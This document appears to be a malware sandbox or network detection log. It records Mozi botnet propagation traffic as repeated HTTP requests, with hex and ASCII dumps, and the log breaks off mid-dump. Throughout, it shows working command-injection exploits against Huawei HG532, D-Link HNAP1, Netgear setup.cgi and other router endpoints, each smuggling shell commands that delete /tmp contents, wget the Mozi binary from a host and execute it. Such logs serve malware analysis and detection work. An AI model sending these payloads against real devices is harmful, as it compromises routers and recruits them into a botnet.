                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 101.108.225.47:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 182.216.146.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 76.17.188.37:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 6.218.88.254:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 207.207.172.96:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 170.243.90.64:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 60.29.245.149:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 222.76.197.121:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 42.242.241.33:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 